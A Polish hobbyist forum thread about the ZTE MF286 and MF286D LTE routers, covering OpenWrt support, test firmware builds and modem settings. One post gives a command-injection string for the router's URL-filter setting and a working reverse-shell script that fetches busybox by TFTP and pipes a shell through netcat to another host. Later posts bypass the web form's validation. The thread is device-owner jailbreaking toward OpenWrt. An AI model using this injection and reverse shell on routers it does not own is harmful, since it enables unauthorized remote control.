876 (edytowany przez MiG25 2022-02-05 09:20:25)

Odp: ZTE MF286 zmiana FW

Leo-PL napisał/a:

@MiG25: a jak z tą binarką? https://busybox.net/downloads/binaries/ … sybox-mips

@Leo-PL, jest to samo .

pawol napisał/a:

To będzie niezły burdel openwrt na mf286 z polskiego rynku.

Ta moja sztuka jest z Tele2 , więc to "ogólnoświatowy" problem.

877

Odp: ZTE MF286 zmiana FW

Leo-PL napisał/a:

A tak bogiem a prawdą, to do instalacji OpenWrt nie trzeba telnetd, to będzie dało się opędzić samym skryptem ładowanym po TFTP.

W zasadzie to chciałem jakieś komendy AT powysyłac i zobaczyć odpowiedzi... Ale w sumie z reanimacją tego to bym się zdał na Ciebie smile
Może da się ten loader ściągnąć ze spawnego ? Albo może ktoś ma framework dla MF286A ?

878

Odp: ZTE MF286 zmiana FW

Może ma ktoś tam konto i mógłby ściągnąć te FW ? https://easy-firmware.com/tags/download … 20Firmware
Mam nadzieję ,że skoro modem jest w trybie serwisowym , to aktualizując FW modem też się przy okazji postawi.
W MF286D w taki sposób zmieniło mi się oprogramowanie modemu z Play na TIM.... ( tle ,że aktualizowałem żywy router play , modem zmienił oprogramowanie , ale router wtedy nie wstał , trzeba było przywracać mtd8).

879

Odp: ZTE MF286 zmiana FW

Jeżeli nie mylę www to na tej co podałeś nie wystarczy konto tylko trzeba zrobić opłatę już nie pamiętam czy za plik czy za range.

880

Odp: ZTE MF286 zmiana FW

No tak ,stąd się pytam czy może ktoś ma któryś z tych FW.
Próbowałem z fw od mf286 ale przy 2% wywala błąd.

881 (edytowany przez Leo-PL 2022-02-05 12:59:59)

Odp: ZTE MF286 zmiana FW

Spróbuję zdumpować po Saharze firmware ze swojego modemu, oraz rozpakować paczkę z firmwarem DNA do 286. Jeżeli tam jest ten sam firmware, to powinno jakoś wejść. Jestem ciekaw na ile to ma szansę się udać na porcie szeregowym ztunelowanym przez Socata przez SSH po dwóch Wireguardach 500km dalej ;-]

MiG25 napisał/a:
Leo-PL napisał/a:

@MiG25: a jak z tą binarką? https://busybox.net/downloads/binaries/ … sybox-mips

@Leo-PL, jest to samo .

pawol napisał/a:

To będzie niezły burdel openwrt na mf286 z polskiego rynku.

Ta moja sztuka jest z Tele2 , więc to "ogólnoświatowy" problem.

Ech. Będę musiał pokombinować dalej przez konsolę. Sam komunikat znaczy tyle, że któryś syscall przy otwieraniu binarki zwrócił kod błędu ENOENT. Tyle. Który dokładnie? Nie wiadomo.

882

Odp: ZTE MF286 zmiana FW

Oba modele, MF286 i MF286D weszły oficjalnie do repozytorium OpenWrt. Gratulacje dla wszystkich zaangażowanych w tym temacie.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

883

Odp: ZTE MF286 zmiana FW

ze jak? ze juz? tak szybko? smile

884

Odp: ZTE MF286 zmiana FW

Express. Dostawa w sobotę. Płatne ekstra.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

885

Odp: ZTE MF286 zmiana FW

@Królik Barrrrdzo dobra robota! ;-)

886 (edytowany przez Królik 2022-02-05 14:44:19)

Odp: ZTE MF286 zmiana FW

No to mamy wsparcie. Super, że się udało tak szybko.

EDIT:

Leo-PL napisał/a:

@Królik Barrrrdzo dobra robota! ;-)

I vice versa. smile

Mam i używam: Fujitsu Futro S720, Netgear R6220, Unielec U7621-06, TP-Linki 1043 V1, V2, Linksysy EA7500v2, AeroHive AP350, Linksys EA8500, ZTE MF286d.
Mam: D-Linki DWR-921, DWR-118, DWR-116, TP-Link WDR-4900 v1, Checkpoint L-50, Linksysy 1900ACS, LB-Link BL-W1200,

887

Odp: ZTE MF286 zmiana FW

na czym stanelo w koncu? trza recznie nodem konfigurowac? da sie z gui?

888 (edytowany przez Królik 2022-02-05 14:50:14)

Odp: ZTE MF286 zmiana FW

pawol napisał/a:

na czym stanelo w koncu? trza recznie nodem konfigurowac? da sie z gui?

U Cezarego jak zwykle będzie obsłużone od strzała. W czystym jak zwykle nie.

Mam i używam: Fujitsu Futro S720, Netgear R6220, Unielec U7621-06, TP-Linki 1043 V1, V2, Linksysy EA7500v2, AeroHive AP350, Linksys EA8500, ZTE MF286d.
Mam: D-Linki DWR-921, DWR-118, DWR-116, TP-Link WDR-4900 v1, Checkpoint L-50, Linksysy 1900ACS, LB-Link BL-W1200,

889

Odp: ZTE MF286 zmiana FW

Generalnie modem działa. Jeżeli nie chce działać to ustawiasz proto 3g, uruchamiasz połączenie, zmieniasz uqmi i jest. Jeżeli modem na początku wisi to wystarczy zrobić delay na np. 15s i działa połączenie.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

890

Odp: ZTE MF286 zmiana FW

gdzie pociagne buildy cezarego? zmeczony jestem juz tym recznym poprawianiem swiata. Chçe to wrzucic i ma dzialac

891

Odp: ZTE MF286 zmiana FW

Na razie są tu, testowe: https://dl.eko.one.pl/test/, później będą normalnie w repo. Nie używaj ich jeżeli nie chcesz zbawiać świata, bo pewnie jeszcze parę razy będzie to aktualizowane. Np. teraz właśnie kompiluję nowe...

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

892 (edytowany przez Leo-PL 2022-02-05 16:27:09)

Odp: ZTE MF286 zmiana FW

Odnośnie exploita do shella na MF286D, ustaliłem co następuje:
- zte_debug.sh istnieje
- Ustawienie filtra z palca przez "nv set websURLFilters=test&&zte_debug.sh 192.168.32.22 sploit" ściąga i wykonuje exploit
- Filtrowanie stringów w webie przez JSa jest dużo bardziej upierdliwe i jeszcze go nie obszedłem, ale przypadkiem raz udało mi się wprowadzić stringa który to zawierał, tylko wskazywał wtedy na niewłaściwe IP.
- Busybox ściągnięty stąd: https://busybox.net/downloads/binaries/ … box-armv7m i zrenamowany jako telnetd wykonuje się tak jak trzeba, w tym odpalony przez buga w parserze.
- Hasło "admin" nie pasuje - to generuje się co reset do ustawień fabrycznych i nie jest związane z hasłem do weba, które jest na etykiecie na spodzie modemu. Potrzebna jest wersja telnetd która nie sprawdza hasła, lub inny sposób na reverse shell, choćby przy użyciu netcata.

Zostało więc tylko rozgryzienie zabezpieczeń w JSach, albo ich obejście. Bug w parserze NV wciąż tam jest.
Moja wersji softu: Nordic_MF286D_B10

Edit: Jest i sposób na reverse shell, używajacy tego samego busyboxa:

#!/bin/sh
# run nc -l -p 2137 on host on IP 192.168.32.22
tftp -g 192.168.32.22 -l /tmp/nc -r busybox
chmod 777 /tmp/nc
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|/tmp/nc 192.168.32.22 2137 >/tmp/f

Teraz tylko ten cholerny javascript neutral

893

Odp: ZTE MF286 zmiana FW

Następne obrazy testowe z 2022-02-05: 
- dla ZTE MF286: https://dl.eko.one.pl/test/zte_mf286/20220205/
- dla ZTE MF286D: https://dl.eko.one.pl/test/zte_mf286d/20220205/

Zmiany to głównie synchronizacja DTSów z aktualnymi źródłami OpenWrt wersji rozwojowej (już tak mogę pisać smile), zmieniłem kody w platform.sh dla MF286D na zgodne z tym co jest w commicie do OpenWrt i kilka innych pomniejszych poprawek. Testujcie jak chcecie.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

894

Odp: ZTE MF286 zmiana FW

czym sie rozni luci od mifi? nie znam tego zagadnienia mifi

895

Odp: ZTE MF286 zmiana FW

Czytaj: https://eko.one.pl/?p=mifi oraz https://eko.one.pl/?p=easyconfig . Moje prywatne autorskie gui które pisałem dla siebie.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

896 (edytowany przez Krzakuuu 2022-02-05 16:59:51)

Odp: ZTE MF286 zmiana FW

@Leo-PL
Na Nordic_MF286D_B10 kliknąłem prawym > zbadaj na pole w które dodaje się url do filtrowania
Zmieniłem name i maxlength aby wyglądało to w ten sposób

<input type="text" name="ddd" id="addURLFilter" maxlength="332" class="required form-control valid">

Dzięki temu można dodać cokolwiek się chce, zauważyłem że można nawet dodać puste pole.
Po restarcie wciąż urządzenie pamięta to co dodałem jednak nie udało mi się uruchomić telnetu ;(

https://imgur.com/a/DyrzKqo

897

Odp: ZTE MF286 zmiana FW

Też tak sprawdzałem i nie szło uruchomić nic.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.

898 (edytowany przez Leo-PL 2022-02-05 17:11:22)

Odp: ZTE MF286 zmiana FW

Krzakuuu napisał/a:

@Leo-PL
Na Nordic_MF286D_B10 kliknąłem prawym > zbadaj na pole w które dodaje się url do filtrowania
Zmieniłem name i maxlength aby wyglądało to w ten sposób

<input type="text" name="ddd" id="addURLFilter" maxlength="332" class="required form-control valid">

Dzięki temu można dodać cokolwiek się chce, zauważyłem że można nawet dodać puste pole.
Po restarcie wciąż urządzenie pamięta to co dodałem jednak nie udało mi się uruchomić telnetu ;(

https://imgur.com/a/DyrzKqo

Tak. Da się wpisać, sprawdzałem. Ale pod spodem jeszcze jakiś validator to mieli i nie przepuszcza requestu.
Raz udało mi się dodać taki string, ale pewnie przez jakiś wyścig. Wpisanie choć jednego "&" ciągle wyrzuca komunikat nawet po zmianie nazwy pola.

899

Odp: ZTE MF286 zmiana FW

Cezary napisał/a:

Następne obrazy testowe z 2022-02-05: 
- dla ZTE MF286: https://dl.eko.one.pl/test/zte_mf286/20220205/
- dla ZTE MF286D: https://dl.eko.one.pl/test/zte_mf286d/20220205/

Zmiany to głównie synchronizacja DTSów z aktualnymi źródłami OpenWrt wersji rozwojowej (już tak mogę pisać smile), zmieniłem kody w platform.sh dla MF286D na zgodne z tym co jest w commicie do OpenWrt i kilka innych pomniejszych poprawek. Testujcie jak chcecie.

MiFi na MF286D działa....
Pisałeś coś do wyboru bandów przez gui... Jeszcze nie do publikacji ?

900 (edytowany przez Cezary 2022-02-05 17:39:15)

Odp: ZTE MF286 zmiana FW

MiG25 napisał/a:

MiFi na MF286D działa....
Pisałeś coś do wyboru bandów przez gui... Jeszcze nie do publikacji ?

Na dole menu jest pozycja "Modem", tam to jest. Choć publicznie nie wypchałem tego jeszcze do gita. Odśwież cache przeglądarki albo uruchom w trybie prywatnym jeżeli tego nie widzisz.

Masz niepotrzebny router, uszkodzony czy nie - chętnie przygarnę go.